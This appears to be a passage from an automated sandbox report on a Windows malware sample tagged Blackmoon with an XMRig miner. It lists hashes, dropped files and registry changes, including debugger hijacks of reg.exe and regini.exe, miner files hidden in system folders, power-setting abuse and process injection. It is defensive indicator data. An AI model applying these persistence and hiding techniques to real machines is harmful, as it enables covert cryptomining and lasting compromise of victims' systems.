Analysis
-
max time kernel
21s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2024 04:00
Behavioral task
behavioral1
Sample
34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe
Resource
win10v2004-20241007-en
General
-
Target
34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe
-
Size
4.2MB
-
MD5
fbdf1a2c578681439220a0b44b216763
-
SHA1
fe240d313e410a7e34e2400d83b815658ea14040
-
SHA256
34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5
-
SHA512
52da392ff02d9af10efccfe9a4aad462e4f0d0df47bf919606664f7c5a56d5ca4a35e160aae23ce8510ba4efa211ca64444a51a88a1aff5e5509e9e8ef921c6f
-
SSDEEP
49152:ogvUQRjHqNEODi4lyLAiaPK2eVn0a4FKW12k9hnOru+:PvUQRwx249iaMVn0vQWMkbnOS+
Malware Config
Signatures
-
Blackmoon family
-
Detect Blackmoon payload 2 IoCs
resource yara_rule behavioral2/memory/3620-3-0x0000000000400000-0x0000000000691000-memory.dmp family_blackmoon behavioral2/files/0x0007000000023c94-5.dat family_blackmoon -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 3788 created 612 3788 powershell.EXE 5 PID 4496 created 612 4496 powershell.EXE 5 PID 4496 created 612 4496 powershell.EXE 5 -
Xmrig family
-
XMRig Miner payload 1 IoCs
resource yara_rule behavioral2/memory/2708-664-0x00007FF6F94C0000-0x00007FF6F9ADF000-memory.dmp xmrig -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts rldencj.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe rldencj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "svchost.exe" rldencj.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe rldencj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "svchost.exe" rldencj.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Executes dropped EXE 3 IoCs
pid Process 2188 rldencj.exe 2340 rldencj.exe 4524 awwlau.exe -
pid Process 4496 powershell.EXE 3788 powershell.EXE -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 2900 cmd.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2756 cmd.exe 4168 powercfg.exe 1588 cmd.exe 920 cmd.exe 1036 powercfg.exe 1364 cmd.exe 4944 powercfg.exe 228 cmd.exe -
Drops file in System32 directory 13 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 rldencj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 rldencj.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\System32\Tasks\qynqcidr svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE rldencj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies rldencj.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3788 set thread context of 3392 3788 powershell.EXE 106 PID 4496 set thread context of 2220 4496 powershell.EXE 112 -
resource yara_rule behavioral2/files/0x0007000000023c9d-652.dat upx behavioral2/memory/2708-658-0x00007FF6F94C0000-0x00007FF6F9ADF000-memory.dmp upx behavioral2/memory/2708-664-0x00007FF6F94C0000-0x00007FF6F9ADF000-memory.dmp upx -
Drops file in Windows directory 16 IoCs
description ioc Process File created \??\c:\windows\fonts\mfbdumnc\rdepgb.exe rldencj.exe File created \??\c:\windows\fonts\mfbdumnc\WinRing0x64.sys rldencj.exe File opened for modification \??\c:\windows\fonts\mfbdumnc\rdepgb.exe rldencj.exe File created \??\c:\windows\fonts\mfbdumnc\config.json rldencj.exe File created \??\c:\windows\fonts\aofsjffn\dpuepgu.exe rldencj.exe File created C:\Windows\Tasks\$ahlfyuafecoqfmuv.job awwlau.exe File created \??\c:\windows\ime\bhlvrjq\djfica.exe rldencj.exe File opened for modification \??\c:\windows\fonts\macunp\rldencj.exe 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe File opened for modification C:\Windows\Tasks\$ahlfyuafshfaaluc.job awwlau.exe File opened for modification \??\c:\windows\ime\bhlvrjq\djfica.exe rldencj.exe File created \??\c:\windows\fonts\macunp\HighPower.pow rldencj.exe File opened for modification C:\Windows\ServiceState\EventLog\Data\lastalive0.dat svchost.exe File created \??\c:\windows\fonts\macunp\rldencj.exe 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe File opened for modification C:\Windows\Tasks\$ahlfyuafecoqfmuv.job awwlau.exe File created C:\Windows\Tasks\$ahlfyuafshfaaluc.job awwlau.exe File created \??\c:\windows\fonts\macunp\BestPower.pow rldencj.exe -
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rldencj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rldencj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language awwlau.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4160 cmd.exe 1172 PING.EXE -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000004c4b263ce3325643a89d57a9b6291f6800000000020000000000106600000001000020000000c73062fa2e86f52eb8f9620c362ab68717e18b6a16f71cc2c8e7389b4d0dd6e5000000000e80000000020000200000004755121ef49d7387ff6214428ed56f91bd088f87a2d2a565276513d289ce7617b0030000dc847d4b72482d8f8ea54f94499ad55165e262a59938a320b8103785162232c80b838ada155d66b13740f788ca4622be62801f634ee4ca26b36f3f71f5cba91eb64eb50aabbb1addd8e66f9b2780f603fa4463133fc2f61299a927798bf66af644d0bd31ab9bedf6f7da59039945e08e2119123d7bccef62facbf73381c607ff1a5b817310f6fc2a2aa8f0b4eadbe55326461c19fbf7ee45f66996393f4e2ebdce5be4929b3bdf30aab47ea88f05d86927f4d7847608ad76fa633eadabb400afd043b9ebb34479d356aeca210936858aa41ee7a3290caf9d7dd0ce52f780c525397bd0d47bed33bfe69b72b547d729c61a9416770fc6f3db1e49cba30a71c92a52cc2a6f7da90e96c6d8ba01a66207b0b95064ed21b651e8e60e6c619d798170f17407b84f575f1c2ba982ea765c8b7ffc9c9dca18ba6264e9ec837995e99fa02c3844097e96b040a154a3582bc67d1c7ad28f38feed491831d10b332893459a96bc9914ed0e8ac7ff5c89c885a332923e51f205c0ab7d80f91b820996325912a4c7326134c33f8f152c29767294473035fa931c02a7585dae35ae69b20b4d199e56e4321677bda62c258bc5a9ab15ae970607faab71661dc705dc828e3b481605f91667eb79f2958c4d3677c7583aaacddd4b65a35e38d12b7f5f0337ee8094fbed72758af5a3fd8c2994fdc35dc5102240dbc36bd7392731c60bf045f5fcf3559c34eab53046bb6e73e940b3ce2816539ab1ee22b261a2f6aa5ae7d0291006d44e899972dacddbda4882ac6a29df2871195ce629cf79e92fd8c5bc870c9254cea19409718f9fcff2e335b0dd524e487183dcadb9f01182d062808adacae163e4631d711137ea5af60fd8bf89a1af72f941756372bff9ac43a3674331a7d681ce4b69eca788c023f9dc041bab6c39e8d26418061cb8da98681f63ec4af23182ac8ba7d882b4a936c632a63db81840762e111ff98740f0d780817550bafb63654eb977face5a531d6d974d1bd87cd110aaa40ce698d792c6344fe053c4c7c56603758981c644f6ea5621852901204fddde18f5c69582fd409265a8f3da80f357e702bdaf34a78d16a058fcc999dd0c8ef50501f6b7d4da2a816541ff455baaaad656e8bcd98cd05fd47675f6af7b25be7d50659041e5c1a6a2ef9d01f8f9c3f7260854f046d44eccea13269c3f2b58c54a1fcf4b8071bf269da29ab2a02130de76ba26d01d82242bab0a8b4a45fdc5fc1be584838e64226e4318430a35ba9c495a498ea331a819c983864421e30539d1b18ccf44cf286faee1e25f481f2a136ab6fa18287ef846c7d79e60e0787148a5400000003e76aa6d43713f27f217ba178cc95c2c2436bf325d92b901a761fddeb6a398ed1203ce653f2dac0f03f9e013a91bbe3380d0a2e4cff0ea3228e8bee61f31591d mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C00F9831C6C3 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000004c4b263ce3325643a89d57a9b6291f68000000000200000000001066000000010000200000005253464743166013731c60a301784cf73b47a80a43bc0fa6a64df3974456cf34000000000e8000000002000020000000f4d9344ca7964cd53cd6273714b591045df3e03f6898b1b7793bfd90a2bb2c128000000038a602793397b606bcbed1b8e70a3b26ea9caa75d1b302f4bd1e75907339e0fa8e2e2f3b6e05384b81b53ec5887bb6e04f11c1087f47298e3c808f164e98acdb5ea7ea34ad0841f7f1a8778eebb01b067597003db18fbbe770ee03100c6d73c23400ce328101fe3ab357a025a08da41fc23beb3a385cbcb6d2472f4d931ce4a94000000074abbe217fc7844aafe32b9b08914e7ba899a47d68d8c28591c0ddd1acbc48317f8a96e138294f4839acb0257a671f2dd5022f1e0df02103ea0393b19bb0711f mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rldencj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rldencj.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rldencj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rldencj.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rldencj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rldencj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rldencj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00F9831C6C3" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C00F9831C6C3" mousocoreworker.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1172 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 880 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3620 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe 3620 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe 2188 rldencj.exe 2188 rldencj.exe 2340 rldencj.exe 2340 rldencj.exe 2340 rldencj.exe 2340 rldencj.exe 3788 powershell.EXE 3788 powershell.EXE 4496 powershell.EXE 3788 powershell.EXE 3392 dllhost.exe 3392 dllhost.exe 4496 powershell.EXE 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 4496 powershell.EXE 4496 powershell.EXE 3392 dllhost.exe 3392 dllhost.exe 3392 dllhost.exe 4496 powershell.EXE -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3620 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3620 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe Token: SeDebugPrivilege 2188 rldencj.exe Token: SeDebugPrivilege 2340 rldencj.exe Token: SeDebugPrivilege 2340 rldencj.exe Token: SeDebugPrivilege 3788 powershell.EXE Token: SeDebugPrivilege 4496 powershell.EXE Token: SeDebugPrivilege 3788 powershell.EXE Token: SeDebugPrivilege 3392 dllhost.exe Token: SeShutdownPrivilege 2744 mousocoreworker.exe Token: SeCreatePagefilePrivilege 2744 mousocoreworker.exe Token: SeShutdownPrivilege 2744 mousocoreworker.exe Token: SeCreatePagefilePrivilege 2744 mousocoreworker.exe Token: SeDebugPrivilege 4496 powershell.EXE Token: SeDebugPrivilege 2220 dllhost.exe Token: SeShutdownPrivilege 2744 mousocoreworker.exe Token: SeCreatePagefilePrivilege 2744 mousocoreworker.exe Token: SeShutdownPrivilege 3932 RuntimeBroker.exe Token: SeShutdownPrivilege 2744 mousocoreworker.exe Token: SeCreatePagefilePrivilege 2744 mousocoreworker.exe Token: SeShutdownPrivilege 3932 RuntimeBroker.exe Token: SeShutdownPrivilege 2744 mousocoreworker.exe Token: SeCreatePagefilePrivilege 2744 mousocoreworker.exe Token: SeAssignPrimaryTokenPrivilege 4992 WMIC.exe Token: SeIncreaseQuotaPrivilege 4992 WMIC.exe Token: SeSecurityPrivilege 4992 WMIC.exe Token: SeTakeOwnershipPrivilege 4992 WMIC.exe Token: SeLoadDriverPrivilege 4992 WMIC.exe Token: SeSystemtimePrivilege 4992 WMIC.exe Token: SeBackupPrivilege 4992 WMIC.exe Token: SeRestorePrivilege 4992 WMIC.exe Token: SeShutdownPrivilege 4992 WMIC.exe Token: SeSystemEnvironmentPrivilege 4992 WMIC.exe Token: SeUndockPrivilege 4992 WMIC.exe Token: SeManageVolumePrivilege 4992 WMIC.exe Token: SeShutdownPrivilege 4168 powercfg.exe Token: SeCreatePagefilePrivilege 4168 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 940 WMIC.exe Token: SeIncreaseQuotaPrivilege 940 WMIC.exe Token: SeSecurityPrivilege 940 WMIC.exe Token: SeTakeOwnershipPrivilege 940 WMIC.exe Token: SeLoadDriverPrivilege 940 WMIC.exe Token: SeSystemtimePrivilege 940 WMIC.exe Token: SeBackupPrivilege 940 WMIC.exe Token: SeRestorePrivilege 940 WMIC.exe Token: SeShutdownPrivilege 940 WMIC.exe Token: SeSystemEnvironmentPrivilege 940 WMIC.exe Token: SeUndockPrivilege 940 WMIC.exe Token: SeManageVolumePrivilege 940 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 4992 WMIC.exe Token: SeIncreaseQuotaPrivilege 4992 WMIC.exe Token: SeSecurityPrivilege 4992 WMIC.exe Token: SeTakeOwnershipPrivilege 4992 WMIC.exe Token: SeLoadDriverPrivilege 4992 WMIC.exe Token: SeSystemtimePrivilege 4992 WMIC.exe Token: SeBackupPrivilege 4992 WMIC.exe Token: SeRestorePrivilege 4992 WMIC.exe Token: SeShutdownPrivilege 4992 WMIC.exe Token: SeSystemEnvironmentPrivilege 4992 WMIC.exe Token: SeUndockPrivilege 4992 WMIC.exe Token: SeManageVolumePrivilege 4992 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 940 WMIC.exe Token: SeIncreaseQuotaPrivilege 940 WMIC.exe Token: SeSecurityPrivilege 940 WMIC.exe Token: SeTakeOwnershipPrivilege 940 WMIC.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3620 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe 2188 rldencj.exe 2340 rldencj.exe 3488 Conhost.exe 4432 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3620 wrote to memory of 4160 3620 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe 83 PID 3620 wrote to memory of 4160 3620 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe 83 PID 3620 wrote to memory of 4160 3620 34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe 83 PID 4160 wrote to memory of 1172 4160 cmd.exe 86 PID 4160 wrote to memory of 1172 4160 cmd.exe 86 PID 4160 wrote to memory of 1172 4160 cmd.exe 86 PID 4160 wrote to memory of 2188 4160 cmd.exe 96 PID 4160 wrote to memory of 2188 4160 cmd.exe 96 PID 4160 wrote to memory of 2188 4160 cmd.exe 96 PID 2340 wrote to memory of 4524 2340 rldencj.exe 99 PID 2340 wrote to memory of 4524 2340 rldencj.exe 99 PID 2340 wrote to memory of 4524 2340 rldencj.exe 99 PID 3788 wrote to memory of 3392 3788 powershell.EXE 106 PID 3788 wrote to memory of 3392 3788 powershell.EXE 106 PID 3788 wrote to memory of 3392 3788 powershell.EXE 106 PID 3788 wrote to memory of 3392 3788 powershell.EXE 106 PID 3788 wrote to memory of 3392 3788 powershell.EXE 106 PID 3788 wrote 